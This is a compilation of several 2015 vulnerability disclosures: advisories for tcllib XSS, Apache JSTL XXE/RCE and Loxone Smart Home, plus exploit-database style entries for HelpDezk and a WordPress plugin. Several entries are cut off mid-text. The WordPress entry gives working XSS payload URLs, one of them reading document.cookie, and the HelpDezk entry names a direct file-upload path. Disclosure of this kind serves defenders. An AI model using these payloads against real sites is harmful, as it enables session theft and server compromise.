SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: Cross-Site-Scripting (XSS) in tcllib's html::textarea Release Date: 26 February 2015 Last Modified: 26 February 2015 Author: Ben Fuhrmannek [ben.fuhrmannek[at]sektioneins.de] Application: tcllib - Tcl standard library - versions 1.0.0 to 1.16; html package versions lower than 1.4.4 Severity: The use of html::textarea always results in XSS. Risk: High Vendor Status: resolved with html package version 1.4.4 Reference: https://www.sektioneins.de/en/advisories/advisory-012015-xss-tcllib-html-textarea.html http://core.tcl.tk/tcllib/tktview/09110adc430de8c91d26015f9697cdd099755e63Overview: "The Tcl Library is a kitchen sink of packages across a broad spectrum of things." - Tcl Library Home (http://core.tcl.tk/tcllib/home) Applications using tcllib's ::html::textarea functions are vulnerable to Cross-Site-Scripting. This function is usually used to programmatically add an HTML <textarea> to the output stream of a CGI script. No publicly available software has been found to be vulnerable. However it is suspected that many non-public Tcl web applications using the ::html::textarea function are in operation.
# Exploit Title: HelpDezk 1.0.1 Multiple Vulnerabilities# Google Dork: "intext: helpdezk-community-1.0.1"# Date: 26-2-2015# Exploit Author: Dennis Veninga# Vendor Homepage: http://www.helpdezk.org/# Vendor contacted: 26-2-2015# Version: 1.0.1# Tested on: Firefox 36 & Chrome 38 / W8.1-x64HelpDezk ->Version: 1.0.1Type: Multiple Critical VulnerabilitiesSeverity: CriticalInfo Exploit: Different exploits making it possible to take over the website/server- Arbitrary File Upload- Remote Command Execution- User Information Disclosure###############################################Arbitrary File Upload, 2 ways ->1. Direct Access:http://{target}/helpdezk/
admin/logos/upload#########
CVE-2015-0254 XXE and RCE via XSL extension in JSTL XML tagsSeverity: ImportantVendor:The Apache Software FoundationVersions Affected:Standard Taglibs 1.2.1The unsupported 1.0.x and 1.1.x versions may also be affected.Description:When an application uses <x:parse> or <x:transform> tags to process untrusted XML documents, a request may utilize external entity references to access resources on the host system or utilize XSLT extensions that may allow remote execution.Mitigation:Users should upgrade to Apache Standard Taglibs 1.2.3 or later.This version uses JAXP’s FEATURE_SECURE_PROCESSING to restrict XML processing. Depending on the Java runtime version in use, additional configuration may be required:Java8: External entity access is automatically disabled if a SecurityManager is active.Java7: JAXP properties may need to be used to disable external access. Seehttp://docs.oracle.com/javase/tutorial/jaxp/properties/properties.htmlJava6 and earlier: A new system property org.apache.taglibs.standard.xml.accessExternalEntity may be used to specify the protocols that can be used to access external entities. This defaults to “all” if no SecurityManager is present and to “” (thereby disabling access) if a SecurityManager is detected.Credit:David Jorm of IIX
# Exploit Title: Wordpress Media Cleaner - XSS# Author: İsmail SAYGILI# Web Site: www.ismailsaygili.com.tr# E-Mail: iletisim@ismailsaygili.com.tr# Date: 2015-02-26# Plugin Download: https://downloads.wordpress.org/plugin/wp-media-cleaner.2.2.6.zip# Version: 2.2.6# Vulnerable File(s): [+] wp-media-cleaner.php# Vulnerable Code(s): [+] 647. Line $view = $_GET['view'] : "issues"; [+] 648. Line $paged = $_GET['paged'] : 1; [+] 653. Line $s = isset ( $_GET[ 's' ] ) ? $_GET[ 's' ] : null;# Request Method(s): [+] GET # Vulnerable Parameter(s): [+] view, paged, s# Proof of Concept--> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS}--> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.
cookie)>&s="><img src=i onerror=prompt(/XSS/)>
SEC Consult Vulnerability Lab Security Advisory < 20150227-0 >============================================================
=========== title: Multiple vulnerabilities product: Loxone Smart Home vulnerable version: Firmware: 5.49; Android-App: 3.4.1 fixed version: 6.3 impact: High homepage: http://www.loxone.com found: 2014-07-02 by: Daniel Schwarz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Berlin - Frankfurt/Main - Montreal - Singapore Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com Manuel Deticek, Alexander Inführ, Robert Pölzelbauer FH-St.Pölten - Institut für IT Sicherheitsforschung http://www.fhstp.ac.at =======================================================================Vendor & product description:-----------------------------"Loxone Electronics was founded in 2008. Our focus is the development andproduction of control solutions for all homes. Our aim is to make homeautomation interesting, affordable and accessible for everyone."URL: http://www.loxone.com/enus/company/about-us.html"The Loxone Smart Home gives the owner full control of every device ortask using a wall switch, phone or smart tablet. Control and automteareas such as: Lighting, Climate, Security, Audio/Video, Shading, andevent Pool and irrigation systems. Your system will adapt all areas ofyour home providing complete smart home automation."URL: http://www.loxone.com/enus/smart-home/overview.html
